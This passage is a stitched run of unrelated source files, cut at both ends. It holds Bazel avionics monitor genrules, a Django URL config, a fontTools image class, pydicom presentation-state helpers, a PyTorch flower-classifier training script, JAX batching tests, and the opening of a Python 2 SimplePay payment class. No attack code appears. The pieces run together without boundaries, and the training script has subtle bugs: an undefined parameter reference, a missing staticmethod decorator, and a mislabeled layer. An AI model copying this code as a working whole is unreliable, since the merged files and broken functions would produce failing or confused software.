    t = tuple(tuple(x) for x in c)
    return t
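# --- Hedged usage sketch (added for illustration, not part of the original file). ---
# choice_list() yields nested (value, label) tuples, the shape expected by e.g. a
# Django ChoiceField's `choices` argument; using it that way is an assumption, not
# something stated above.
if __name__ == "__main__":
    for value, label in choice_list():
        print("{!r}: {}".format(value, label))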
"""This module contains monitor genrules.""" load("//lib/bazel:py_rules.bzl", "py_binary") def _monitor_genrule(monitor_name, name, deps, **kwargs): py_binary( name = "generate_" + name, srcs = [ "//avionics/firmware/monitors:generate_" + monitor_name + "_monitor.py", "//avionics/firmware/monitors:generate_monitor_base.py", name + ".py", ], main = "//avionics/firmware/monitors:generate_" + monitor_name + "_monitor.py", deps = deps + [ "//avionics/firmware/monitors:generate_monitor_base", ], ) native.genrule( name = name + "_genrule", srcs = [name + ".py"], outs = [ name + "_types.c", name + "_types.h", ], tools = [":generate_" + name], cmd = " ".join([ "$(location :generate_" + name + ")", "--autogen_root=$(GENDIR)", "--prefix=" + name, "--config_file=$(location " + name + ".py)", "--source_file=$(location " + name + "_types.c)", "--header_file=$(location " + name + "_types.h)", ]), ) def ads7828_genrule(name, deps, **kwargs): _monitor_genrule("ads7828", name, deps, **kwargs) def analog_genrule(name, deps, **kwargs): _monitor_genrule("analog", name, deps, **kwargs) def bq34z100_genrule(name, deps, **kwargs): _monitor_genrule("bq34z100", name, deps, **kwargs) def ina219_genrule(name, deps, **kwargs): _monitor_genrule("ina219", name, deps, **kwargs) def ltc2309_genrule(name, deps, **kwargs): _monitor_genrule("ltc2309", name, deps, **kwargs) def ltc4151_genrule(name, deps, **kwargs): _monitor_genrule("ltc4151", name, deps, **kwargs) def ltc6804_genrule(name, deps, **kwargs): _monitor_genrule("ltc6804", name, deps, **kwargs) def mcp342x_genrule(name, deps, **kwargs): _monitor_genrule("mcp342x", name, deps, **kwargs) def mcp9800_genrule(name, deps, **kwargs): _monitor_genrule("mcp9800", name, deps, **kwargs) def si7021_genrule(name, deps, **kwargs): _monitor_genrule("si7021", name, deps, **kwargs)
"""MapGo_server URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/3.2/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.conf import settings from django.conf.urls import include from django.conf.urls.static import static from django.contrib import admin from django.urls import path from rest_framework import routers from checkin.views import CheckinViewSet from recommend.views import STCViewSet routers = { "checkin": routers.DefaultRouter(), "recommend": routers.DefaultRouter(), } routers["checkin"].register('Mapgo/checkin', CheckinViewSet, basename='checkin') routers["recommend"].register('Mapgo/recommend', STCViewSet, basename='recommend') urlpatterns = [ path('admin/', admin.site.urls), path('', include(routers["checkin"].urls)), path('Mapgo/checkin/<str:userid>/', CheckinViewSet.as_view({'delete': 'delete'})), path('', include(routers["recommend"].urls)), path('Mapgo/sns/', include('sns.urls')), ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
from collections.abc import Mapping from typing import Any, Iterator, Optional, Tuple import attr from fontTools.misc.transform import Identity, Transform from .misc import _convert_transform @attr.s(auto_attribs=True, slots=True) class Image(Mapping): """Represents a background image reference. See http://unifiedfontobject.org/versions/ufo3/images/ and http://unifiedfontobject.org/versions/ufo3/glyphs/glif/#image. """ fileName: Optional[str] = None """The filename of the image.""" transformation: Transform = attr.ib(default=Identity, converter=_convert_transform) """The affine transformation applied to the image.""" color: Optional[str] = None """The color applied to the image.""" def clear(self) -> None: """Resets the image reference to factory settings.""" self.fileName = None self.transformation = Identity self.color = None def __bool__(self) -> bool: """Indicates whether fileName is set.""" return self.fileName is not None # implementation of collections.abc.Mapping abstract methods. # the fontTools.ufoLib.validators.imageValidator requires that image is a # subclass of Mapping... _transformation_keys_: Tuple[str, str, str, str, str, str] = ( "xScale", "xyScale", "yxScale", "yScale", "xOffset", "yOffset", ) _valid_keys_: Tuple[str, str, str, str, str, str, str, str] = ( "fileName", *_transformation_keys_, "color", ) def __getitem__(self, key: str) -> Any: try: i = self._transformation_keys_.index(key) except ValueError: try: return getattr(self, key) except AttributeError: raise KeyError(key) else: return self.transformation[i] def __len__(self) -> int: return len(self._valid_keys_) def __iter__(self) -> Iterator[str]: return iter(self._valid_keys_)
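# A brief usage sketch of the Mapping behaviour above (assuming this class is
# importable as `Image`): validators that expect a plain dict-like image
# reference can read the same data either through attributes or through keys.
from fontTools.misc.transform import Transform

img = Image(fileName="background.png",
            transformation=Transform(2, 0, 0, 2, 10, 20),
            color="1,0,0,0.5")
assert bool(img)                            # fileName is set
assert img["fileName"] == "background.png"
assert img["xScale"] == 2                   # indexes into the transformation
assert dict(img)["xOffset"] == 10           # iteration yields the valid keys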
from datetime import datetime

import pydicom
from pydicom.dataset import Dataset, DataElement, Tag
from pydicom.sequence import Sequence


def get_gsps_file_metadata():
    file_meta = Dataset()
    file_meta.MediaStorageSOPClassUID = "1.2.840.10008.5.1.4.1.1.11.1"  # Grayscale Softcopy Presentation State Storage SOP Class
    file_meta.MediaStorageSOPInstanceUID = pydicom.uid.generate_uid()
    file_meta.ImplementationClassUID = "1.2.276.0.7230010.3.0.3.4.1"
    file_meta.ImplementationVersionName = "GSPS_DEMO"
    return file_meta


def set_gsps_general_study_info(dataset, file_meta, series_instance_uid):
    dataset.SOPClassUID = file_meta.MediaStorageSOPClassUID
    dataset.SOPInstanceUID = file_meta.MediaStorageSOPInstanceUID
    dataset.AccessionNumber = ""
    dataset.Modality = "PR"  # Presentation State
    dataset.Manufacturer = ""
    dataset.SeriesDescription = "GSPS demo"
    dataset.SeriesInstanceUID = series_instance_uid
    dataset.SeriesNumber = 1
    dataset.InstanceNumber = 1
    dataset.ContentLabel = "GSPS_demo"
    dataset.PresentationCreationDate = datetime.now().date().strftime("%Y%m%d")
    dataset.PresentationCreationTime = datetime.now().time().strftime("%H%M%S")
    dataset.ContentCreatorName = "GSPS^demo"
    dataset.PresentationLUTShape = "IDENTITY"
    return dataset


def set_content_description(dataset, description):
    dataset.ContentDescription = description
    return dataset


def set_referenced_image_info(dataset, series_instance_uid, sop_class_uid, sop_instance_uid):
    referenced_series_dataset = Dataset()
    referenced_series_dataset.SeriesInstanceUID = series_instance_uid

    referenced_image_dataset = Dataset()
    referenced_image_dataset.ReferencedSOPClassUID = sop_class_uid
    referenced_image_dataset.ReferencedSOPInstanceUID = sop_instance_uid

    # Use the standard DICOM keywords so pydicom stores these as real elements.
    referenced_series_dataset.ReferencedImageSequence = Sequence([referenced_image_dataset])
    dataset.ReferencedSeriesSequence = Sequence([referenced_series_dataset])
    return dataset


def copy_details_from_input_dicom(dicom, input_dicom):
    data_elements = ['PatientID', 'PatientBirthDate', 'StudyInstanceUID', 'StudyDescription', 'PatientName',
                     'PatientSex', 'StudyID', 'StudyDate', 'StudyTime', 'ReferringPhysicianName', 'AccessionNumber']
    # Match on the element keyword (e.g. 'PatientID'), not its display name (e.g. 'Patient ID').
    for de in input_dicom:
        if de.keyword in data_elements:
            dicom.add(input_dicom.data_element(de.keyword))
    return dicom


def add_graphic_annotation(dicom, group_number, layer, overlay_type, origin, rows, columns, data):
    dicom[group_number, 0x1001] = DataElement(Tag(group_number, 0x1001), "CS", layer)
    dicom[group_number, 0x40] = DataElement(Tag(group_number, 0x40), "CS", overlay_type)
    dicom[group_number, 0x50] = DataElement(Tag(group_number, 0x50), "SS", origin)
    dicom[group_number, 0x10] = DataElement(Tag(group_number, 0x10), "US", rows)
    dicom[group_number, 0x11] = DataElement(Tag(group_number, 0x11), "US", columns)
    dicom[group_number, 0x100] = DataElement(Tag(group_number, 0x100), "US", 1)  # OverlayBitsAllocated
    dicom[group_number, 0x102] = DataElement(Tag(group_number, 0x102), "US", 0)  # OverlayBitPosition
    dicom[group_number, 0x3000] = DataElement(Tag(group_number, 0x3000), "OW", data)
    return dicom


def add_graphic_layer(dicom, layer_name, layer_description, layer_order):
    ds_graphic_layer = Dataset()
    ds_graphic_layer.GraphicLayer = layer_name
    ds_graphic_layer.GraphicLayerOrder = layer_order
    ds_graphic_layer.GraphicLayerRecommendedDisplayGrayscaleValue = 65535
    ds_graphic_layer.GraphicLayerDescription = layer_description

    if dicom.get("GraphicLayerSequence"):
        dicom.GraphicLayerSequence.append(ds_graphic_layer)
    else:
        dicom.GraphicLayerSequence = Sequence([ds_graphic_layer])
    return dicom


def add_displayed_area_selection(dicom, columns, rows):
ds_displayed_area_selection = Dataset() ds_displayed_area_selection.DisplayedAreaTopLeftHandCorner = [1, 1] ds_displayed_area_selection.DisplayedAreaBottomRightHandCorner = [columns, rows] ds_displayed_area_selection.PresentationSizeMode = "SCALE TO FIT" ds_displayed_area_selection.PresentationPixelAspectRatio = [1, 1] dicom.DisplayedAreaSelections = Sequence([ds_displayed_area_selection]) return dicom def add_presentation_lut(dicom): # LUT - Look Up Table for colors ds_presentation_lut = Dataset() ds_presentation_lut.LUTDescriptor = [256, 0, 12] ds_presentation_lut.data_element("LUTDescriptor").VR = "US" ds_presentation_lut.LUTExplanation = "LUT with gamma 1.0, descriptor 256/0/12" ds_presentation_lut.LUTData = [0, 16, 32, 48, 64, 80, 96, 112, 128, 144, 160, 176, 192, 208, 224, 240, 256, 273, 289, 305, 321, 337, 353, 369, 385, 401, 417, 433, 449, 465, 481, 497, 513, 529, 546, 562, 578, 594, 610, 626, 642, 658, 674, 690, 706, 722, 738, 754, 770, 786, 802, 819, 835, 851, 867, 883, 899, 915, 931, 947, 963, 979, 995, 1011, 1027, 1043, 1059, 1075, 1092, 1108, 1124, 1140, 1156, 1172, 1188, 1204, 1220, 1236, 1252, 1268, 1284, 1300, 1316, 1332, 1348, 1365, 1381, 1397, 1413, 1429, 1445, 1461, 1477, 1493, 1509, 1525, 1541, 1557, 1573, 1589, 1605, 1621, 1638, 1654, 1670, 1686, 1702, 1718, 1734, 1750, 1766, 1782, 1798, 1814, 1830, 1846, 1862, 1878, 1894, 1911, 1927, 1943, 1959, 1975, 1991, 2007, 2023, 2039, 2055, 2071, 2087, 2103, 2119, 2135, 2151, 2167, 2184, 2200, 2216, 2232, 2248, 2264, 2280, 2296, 2312, 2328, 2344, 2360, 2376, 2392, 2408, 2424, 2440, 2457, 2473, 2489, 2505, 2521, 2537, 2553, 2569, 2585, 2601, 2617, 2633, 2649, 2665, 2681, 2697, 2713, 2730, 2746, 2762, 2778, 2794, 2810, 2826, 2842, 2858, 2874, 2890, 2906, 2922, 2938, 2954, 2970, 2986, 3003, 3019, 3035, 3051, 3067, 3083, 3099, 3115, 3131, 3147, 3163, 3179, 3195, 3211, 3227, 3243, 3259, 3276, 3292, 3308, 3324, 3340, 3356, 3372, 3388, 3404, 3420, 3436, 3452, 3468, 3484, 3500, 3516, 3532, 3549, 3565, 3581, 3597, 3613, 3629, 3645, 3661, 3677, 3693, 3709, 3725, 3741, 3757, 3773, 3789, 3805, 3822, 3838, 3854, 3870, 3886, 3902, 3918, 3934, 3950, 3966, 3982, 3998, 4014, 4030, 4046, 4062, 4078, 4095] ds_presentation_lut.data_element("LUTData").VR = "US" dicom.PresentationLUTSequence = Sequence([ds_presentation_lut]) return dicom def get_text_annotation(text, bounding_box, anchor_point=None): ds_text_object = Dataset() ds_text_object.BoundingBoxAnnotationUnits = bounding_box["BoundingBoxAnnotationUnits"] ds_text_object.UnformattedTextValue = text ds_text_object.BoundingBoxTopLeftHandCorner = bounding_box["BoundingBoxTopLeftHandCorner"] ds_text_object.BoundingBoxBottomRightHandCorner = bounding_box["BoundingBoxBottomRightHandCorner"] ds_text_object.BoundingBoxTextHorizontalJustification = "LEFT" if anchor_point is not None: ds_text_object.AnchorPointAnnotationUnits = anchor_point["AnchorPointAnnotationUnits"] ds_text_object.AnchorPoint = anchor_point["AnchorPoint"] ds_text_object.AnchorPointVisibility = anchor_point["AnchorPointVisibility"] return ds_text_object def get_circle(cir_rad, cir_pos_x, cir_pos_y): ds_cir_object = Dataset() ds_cir_object.GraphicAnnotationUnits = "PIXEL" ds_cir_object.GraphicDimensions = 2 ds_cir_object.NumberOfGraphicPoints = 2 ds_cir_object.GraphicData = [ cir_pos_x, # x coordinate of middle of circle cir_pos_y, # y coordinate of middle of circle cir_pos_x, # x coordinate of point on circumference cir_pos_y + cir_rad] # y coordinate of point on circumference ds_cir_object.GraphicType = "CIRCLE" 
    ds_cir_object.GraphicFilled = "N"
    return ds_cir_object


def add_graphic_annotations(dicom, layer_name, graphic_objects, text_objects):
    ds_graphic_annotation = Dataset()
    ds_graphic_annotation.GraphicLayer = layer_name
    # Standard DICOM sequence keywords so the annotation is written to the file.
    ds_graphic_annotation.GraphicObjectSequence = Sequence(graphic_objects)
    ds_graphic_annotation.TextObjectSequence = Sequence(text_objects)
    dicom.GraphicAnnotationSequence = Sequence([ds_graphic_annotation])
    return dicom
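# A hypothetical end-to-end sketch composing the helpers above into a minimal
# GSPS dataset. The input path, layer name and geometry are placeholders, and
# a complete presentation state needs more mandatory attributes (plus file
# meta handling on save) than are shown here.
import pydicom
from pydicom.dataset import Dataset

img = pydicom.dcmread("input.dcm")  # placeholder input image

file_meta = get_gsps_file_metadata()
gsps = Dataset()
gsps = set_gsps_general_study_info(gsps, file_meta, pydicom.uid.generate_uid())
gsps = set_content_description(gsps, "Demo annotation")
gsps = copy_details_from_input_dicom(gsps, img)
gsps = set_referenced_image_info(gsps, img.SeriesInstanceUID, img.SOPClassUID, img.SOPInstanceUID)
gsps = add_graphic_layer(gsps, "LAYER1", "Demo layer", 1)
circle = get_circle(20, 128, 128)
label = get_text_annotation("demo", {"BoundingBoxAnnotationUnits": "PIXEL",
                                     "BoundingBoxTopLeftHandCorner": [10, 10],
                                     "BoundingBoxBottomRightHandCorner": [200, 40]})
gsps = add_graphic_annotations(gsps, "LAYER1", [circle], [label])
gsps = add_displayed_area_selection(gsps, img.Columns, img.Rows)
gsps = add_presentation_lut(gsps)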
#!/usr/bin/env python3 import argparse import numpy as np import torch from torch import nn, optim from torchvision import datasets, transforms, models from collections import OrderedDict from workspace_utils import active_session class Train_class: @staticmethod def initialize(data_dir): train_dir = data_dir + '/train' valid_dir = data_dir + '/valid' test_dir = data_dir + '/test' train_data_transforms = transforms.Compose([transforms.RandomRotation(30), transforms.RandomResizedCrop(224), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize([0.485,0.456,0.406],[0.229,0.224,0.225])]) valid_data_transforms = transforms.Compose([transforms.Resize(256), transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485,0.456,0.406],[0.229,0.224,0.225])]) test_data_transforms = transforms.Compose([transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor(), transforms.Normalize([0.485,0.456,0.406],[0.229,0.224,0.225])]) image_datasets = {} image_datasets["train"] = datasets.ImageFolder(train_dir, transform = train_data_transforms) image_datasets["valid"] = datasets.ImageFolder(valid_dir, transform = valid_data_transforms) image_datasets["test"] = datasets.ImageFolder(test_dir, transform = test_data_transforms) train_dataloader = torch.utils.data.DataLoader(image_datasets["train"], batch_size = 64, shuffle =True) valid_dataloader = torch.utils.data.DataLoader(image_datasets["valid"], batch_size = 32) test_dataloader = torch.utils.data.DataLoader(image_datasets["test"], batch_size = 32) print(f"Data loaded from {data_dir} directory.") return image_datasets, train_dataloader, valid_dataloader, test_dataloader @staticmethod def create_model(arch,h_u): if arch.lower() == "vgg13": model = models.vgg13(pretrained=True) else: model = models.densenet121(pretrained=True) for p in model.parameters(): p.requires_grad = False if arch.lower() =='vgg13': classifier = nn.Sequential(OrderedDict([ ('dropout1', nn.Dropout(0.1)), ('fc1', nn.Linear(25088,h_u)), ('relu1', nn.ReLU()), ('dropout2', nn.Linear(h_u, 102)), ('output', nn.LogSoftmax(dim=1)) ])) else: classifier = nn.Sequential(OrderedDict([ ('dropout1', nn.Dropout(0.1)), ('fc1', nn.Linear(1024,h_u)), ('relu1', nn.ReLU()), ('dropout2', nn.Linear(h_u, 102)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier print(f"Model built from {arch} and {hidden_units} hidden units.") return model def measure_validation(model, dataloader, criterion, device): loss = 0 accuracy = 0 with torch.no_grad(): for images, labels in iter(dataloader): images, labels = images.to(device), labels.to(device) output = model.forward(images) loss += criterion(output,labels).item() ps = torch.exp(output) equality = (labels.data == ps.max(dim = 1)[1]) accuracy += equality.type(torch.FloatTensor).mean() return loss,accuracy @staticmethod def train_model(model, train_dataloader, valid_dataloader, learning_rate, epochs, gpu): criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(),lr=learning_rate) device = torch.device("cuda:0" if gpu else "cpu") model.to(device) print_ev = epochs running_loss = 0 steps = 0 running_loss = 0 train_accuracy = 0 with active_session(): for x in range(epochs): model.train() for images, labels in iter(train_dataloader): images, labels = images.to(device), labels.to(device) steps += 1 optimizer.zero_grad() output = model.forward(images) loss = criterion(output, labels) loss.backward() optimizer.step() running_loss += loss.item() ps = torch.exp(output) equality = 
(labels.data == ps.max(dim = 1)[1])
                    train_accuracy += equality.type(torch.FloatTensor).mean()

                    if steps % print_ev == 0:
                        model.eval()
                        with torch.no_grad():
                            valid_lo, valid_acc = Train_class.measure_validation(model, valid_dataloader, criterion, device)

                        print("E: {}/{}.. ".format(x+1, epochs),
                              "T_Loss: {:.3f}.. ".format(running_loss/print_ev),
                              "T_Accuracy: {:.3f}".format(train_accuracy/print_ev),
                              "V_Loss: {:.3f}.. ".format(valid_lo/len(valid_dataloader)),
                              "V_Accuracy: {:.3f}".format(valid_acc/len(valid_dataloader)))

                        running_loss = 0
                        train_accuracy = 0
                        model.train()

        print("Done with the Training!")
        return model, optimizer, criterion


'''usage: python train.py data_directory
Prints out training loss, validation loss, and validation accuracy as the network trains
Options:
- Set directory to save checkpoints: python train.py data_dir --save_dir save_directory
- Choose architecture: python train.py data_dir --arch "vgg13"
- Set hyperparameters: python train.py data_dir --learning_rate 0.01 --hidden_units 512 --epochs 20
- Use GPU for training: python train.py data_dir --gpu
'''

# Get the command line input into the scripts
parser = argparse.ArgumentParser()

# Basic usage: python train.py data_directory
parser.add_argument('data_directory', action='store', default='flowers',
                    help='Set directory to load training data')

# Set directory to save checkpoints: python train.py data_dir --save_dir save_directory
parser.add_argument('--save_dir', action='store', default='.', dest='save_dir',
                    help='Set directory to save checkpoints')

# Choose architecture: python train.py data_dir --arch "vgg13"
parser.add_argument('--arch', action='store', default='densenet121', dest='arch',
                    help='Choose architecture: e.g., "vgg13"')

# Set hyperparameters: python train.py data_dir --learning_rate 0.01 --hidden_units 512 --epochs 20
parser.add_argument('--learning_rate', action='store', default=0.001, dest='learning_rate',
                    help='Choose architecture learning rate')
parser.add_argument('--hidden_units', action='store', default=512, dest='hidden_units',
                    help='Choose architecture hidden units')
parser.add_argument('--epochs', action='store', default=4, dest='epochs',
                    help='Choose architecture number of epochs')

# Use GPU for training: python train.py data_dir --gpu
parser.add_argument('--gpu', action='store_true', default=False, dest='gpu',
                    help='Use GPU for training, set a switch to true')

parse_results = parser.parse_args()

data_dir = parse_results.data_directory
save_dir = parse_results.save_dir
arch = parse_results.arch
learning_rate = float(parse_results.learning_rate)
hidden_units = int(parse_results.hidden_units)
epochs = int(parse_results.epochs)
gpu = parse_results.gpu

# Load and preprocess data
train_obj = Train_class()
image_datasets, train_loader, valid_loader, test_loader = train_obj.initialize(data_dir)

# Building and training the classifier
model_init = train_obj.create_model(arch, hidden_units)
model, optimizer, criterion = train_obj.train_model(model_init, train_loader, valid_loader, learning_rate, epochs, gpu)

# Save the checkpoint
model.to('cpu')
model.class_to_idx = image_datasets['train'].class_to_idx

# state_dict() must be called; saving the bound method itself would pickle the
# optimizer object rather than its state.
checkpoint = {'model': model,
              'state_dict': model.state_dict(),
              'optimizer_state_dict': optimizer.state_dict(),
              'criterion': criterion,
              'epochs': epochs,
              'class_to_idx': model.class_to_idx}

torch.save(checkpoint, save_dir + '/checkpoint.pth')

if save_dir == ".":
    save_dir_name = "current folder"
else:
    save_dir_name = save_dir + " folder"

print(f'Checkpoint saved to {save_dir_name}.')
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as onp from absl.testing import absltest from absl.testing import parameterized import jax.numpy as np from jax import test_util as jtu from jax.abstract_arrays import ShapedArray from jax import lax from jax.api import jit, grad, jvp, vjp, trace_to_jaxpr, jacfwd, jacrev from jax.api import vmap from jax.core import unit from jax.interpreters import partial_eval as pe from jax.util import partial, curry from jax.config import config config.parse_flags_with_absl() class BatchingTest(jtu.JaxTestCase): def testConstantFunction(self): ans = vmap(lambda x: 3)(onp.ones(4)) expected = 3 * onp.ones(4) self.assertAllClose(ans, expected, check_dtypes=False) def testNestedBatchingMatMat(self): matvec = vmap(np.vdot, in_axes=(0, None)) matmat = vmap(matvec, in_axes=(None, 1), out_axes=1) R = onp.random.RandomState(0).randn A = R(4, 3) B = R(3, 2) ans = matmat(A, B) expected = onp.dot(A, B) self.assertAllClose(ans, expected, check_dtypes=False) # this is a crude check that we only call a single dot def pv_like(x): aval = ShapedArray(onp.shape(x), onp.result_type(x)) return pe.PartialVal((aval, unit)) def make_jaxpr(fun, example_args): jaxpr, _, _, _ = trace_to_jaxpr(fun, map(pv_like, example_args)) return jaxpr jaxpr = make_jaxpr(matmat, (A, B)) self.assertEqual(len(jaxpr.eqns), 1) def testPerExampleGradients(self): def predict(params, inputs): for W, b in params: outputs = np.dot(W, inputs) + b inputs = np.tanh(outputs) return outputs def loss(params, data): inputs, targets = data predictions = predict(params, inputs) return np.sum((predictions - targets)**2) batch_size = 5 layer_sizes = [3, 2, 4] R = onp.random.RandomState(0).randn params = [(R(m, n), R(m)) for m, n in zip(layer_sizes[1:], layer_sizes[:-1])] input_vec = R(3) target_vec = R(4) datum = (input_vec, target_vec) input_batch = R(5, 3) target_batch = R(5, 4) batch = (input_batch, target_batch) ans = vmap(partial(grad(loss), params))(batch) for ans_pair, param_pair in zip(ans, params): dW, db = ans_pair W, b = param_pair self.assertEqual(dW.shape, (batch_size,) + W.shape) self.assertEqual(db.shape, (batch_size,) + b.shape) def testJacobians(self): def jacbwd(f, x): y, pullback = vjp(f, x) std_basis = onp.eye(onp.size(y)).reshape((-1,) + onp.shape(y)) jac_flat, = vmap(pullback, out_axes=onp.ndim(y))(std_basis) return jac_flat.reshape(onp.shape(y) + onp.shape(x)) def jacfwd(f, x): pushfwd = lambda v: jvp(f, (x,), (v,)) std_basis = onp.eye(onp.size(x)).reshape((-1,) + onp.shape(x)) y, jac_flat = vmap(pushfwd, out_axes=(None, 0))(std_basis) return jac_flat.reshape(onp.shape(y) + onp.shape(x)) R = onp.random.RandomState(0).randn A = R(4, 3) b = R(4) f = lambda x: np.tanh(np.dot(A, x) + b) x = R(3) self.assertAllClose(jacfwd(f, x), jacbwd(f, x), check_dtypes=False) def testBatchOfCompile(self): side = [] @jit def f(x): side.append(None) return x + x g = jit(vmap(f)) 
self.assertAllClose(g(onp.ones(2)), 2 * onp.ones(2), check_dtypes=False) self.assertEqual(len(side), 1) self.assertAllClose(g(2 * onp.ones(2)), 4 * onp.ones(2), check_dtypes=False) self.assertEqual(len(side), 1) def testSliceLax(self): fun = lambda x: lax.slice(x, (2,), (4,)) R = onp.random.RandomState(0).randn x = R(5, 10) ans = vmap(fun)(x) expected_ans = x[:, 2:4] self.assertAllClose(ans, expected_ans, check_dtypes=False) def testSliceNumpy(self): fun = lambda x: x[:, 2] R = onp.random.RandomState(0).randn x = R(10, 5, 3, 7) ans = vmap(fun)(x) expected_ans = x[:, :, 2] self.assertAllClose(ans, expected_ans, check_dtypes=False) def testNpMaximum(self): fun = lambda x: np.maximum(x, 0.0) R = onp.random.RandomState(0).randn x = R(10, 5, 3, 7) ans = vmap(fun)(x) expected_ans = onp.maximum(x, 0.0) self.assertAllClose(ans, expected_ans, check_dtypes=False) def testNpGtrThan(self): R = onp.random.RandomState(0).randn x = R(10, 5, 3, 7) ans = vmap(lambda x: x > 1.0)(x) expected_ans = x > 1.0 self.assertAllClose(ans, expected_ans, check_dtypes=True) def testNpMaximumPerExampleGrad(self): R = onp.random.RandomState(0).randn x = R(10, 5) W = R(5, 5) fun = lambda W, x: np.sum(np.maximum(np.dot(x, W), 0.0) ** 2) ans = vmap(partial(grad(fun), W))(x) W_t = np.transpose(W) for i in range(10): x_ex = x[i:i + 1] expected_ans = 2.0 * np.dot( np.maximum(np.dot(W_t, np.transpose(x_ex)), 0.0), x_ex) expected_ans = np.transpose(expected_ans) self.assertAllClose(ans[i], expected_ans, check_dtypes=False) def testDotGeneral(self): R = onp.random.RandomState(0).randn x = R(10, 3, 4, 5) y = R(10, 3, 5, 6) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) ans = vmap(fun)(x, y) expected = lax.dot_general(x, y, [((3,), (2,)), ((0, 1), (0, 1))]) self.assertAllClose(ans, expected, check_dtypes=True) x = R(3, 4, 10, 5) y = R(3, 10, 5, 6) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) ans = vmap(fun, in_axes=(2, 1))(x, y) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) expected = onp.stack([fun(x[..., i, :], y[:, i, ...]) for i in range(10)]) self.assertAllClose(ans, expected, check_dtypes=True) x = R(3, 4, 5, 10) y = R(3, 5, 6) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) ans = vmap(fun, in_axes=(3, None))(x, y) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) expected = onp.stack([fun(x[..., i], y) for i in range(10)]) self.assertAllClose(ans, expected, check_dtypes=True) x = R(3, 4, 5) y = R(3, 5, 10, 6) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) ans = vmap(fun, in_axes=(None, 2))(x, y) fun = lambda x, y: lax.dot_general(x, y, [((2,), (1,)), ((0,), (0,))]) expected = onp.stack([fun(x, y[..., i, :]) for i in range(10)]) self.assertAllClose(ans, expected, check_dtypes=True) def testDot(self): # these tests are based on @shoyer's notebook studying gufuncs def vecvec(a, b): dot = np.dot for ndim in range(1, max(a.ndim, b.ndim)): a_ax = 0 if a.ndim > ndim else None b_ax = 0 if b.ndim > ndim else None dot = vmap(dot, in_axes=(a_ax, b_ax)) return dot(a, b) assert vecvec(np.zeros((3,)), np.zeros((3,))).shape == () assert vecvec(np.zeros((2, 3)), np.zeros((3,))).shape == (2,) # TODO(mattjj): this fails due to an xla error in dot_general # assert vecvec(np.zeros((4, 2, 3)), np.zeros((3,))).shape == (4, 2) def testPad(self): R = onp.random.RandomState(0).randn fun = lambda x: lax.pad(x, onp.float32(0), [(1, 2, 1)]) x = R(5, 10).astype(onp.float32) ans = vmap(fun)(x) expected_ans = 
np.stack(list(map(fun, x))) self.assertAllClose(ans, expected_ans, check_dtypes=False) fun = lambda x: lax.pad(x, onp.float32(0), [(1, 2, 1), (0, 1, 0)]) x = R(5, 10, 3).astype(onp.float32) ans = vmap(fun)(x) expected_ans = np.stack(list(map(fun, x))) self.assertAllClose(ans, expected_ans, check_dtypes=False) def testConcatenate(self): R = lambda *shape: onp.random.RandomState(0).randn(*shape).astype(onp.float32) fun = lambda *args: lax.concatenate(args, dimension=0) x, y, z = R(10, 2, 3), R(1, 10, 3), R(4, 3) ans = vmap(fun, in_axes=(0, 1, None))(x, y, z) expected_ans = onp.concatenate([x, onp.swapaxes(y, 0, 1), onp.broadcast_to(z, (10, 4, 3))], 1) self.assertAllClose(ans, expected_ans, check_dtypes=False) fun = lambda *args: lax.concatenate(args, dimension=1) x, y, z = R(10, 2, 1), R(2, 3), R(2, 4, 10) ans = vmap(fun, in_axes=(0, None, 2))(x, y, z) expected_ans = onp.concatenate([x, onp.broadcast_to(y, (10, 2, 3)), onp.moveaxis(z, 2, 0)], 2) self.assertAllClose(ans, expected_ans, check_dtypes=False) def testJacobianIssue54(self): # test modeling the code in https://github.com/google/jax/issues/54 def func(xs): return np.array([x for x in xs]) xs = np.ones((5, 1)) jacrev(func)(xs) # don't crash jacfwd(func)(xs) # don't crash def testAny(self): # test modeling the code in https://github.com/google/jax/issues/108 ans = vmap(np.any)(np.array([[True, False], [False, False]])) expected = np.array([True, False]) self.assertAllClose(ans, expected, check_dtypes=True) if __name__ == '__main__': absltest.main()
__author__ = 'Maruf Maniruzzaman' import logging import collections import urlparse import urllib2 import urllib from datetime import * import base64 import hmac import hashlib from urllib2 import HTTPError import xml.etree.cElementTree as ET from payment import Base logger = logging.getLogger(__name__) class SimplePay(Base): def __init__(self, access_key, secret_key, request_url, fps_url): Base.__init__(self) self.access_key = access_key self.secret_key = secret_key self.request_url = request_url self.FPS_URL = fps_url def create_form_inputs(self, amount, description, referenceId=None, immediateReturn=None, returnUrl=None, abandonUrl=None, process_immediate=None, ipnUrl=None, collect_shipping_address=None): form_inputs = {'accessKey': self.access_key, 'amount': str(amount), 'description': description, "signatureVersion": "2", "signatureMethod": "HmacSHA256"} if referenceId is not None: form_inputs['referenceId'] = str(referenceId) if immediateReturn is not None: form_inputs['immediateReturn'] = str(immediateReturn) if returnUrl is not None: 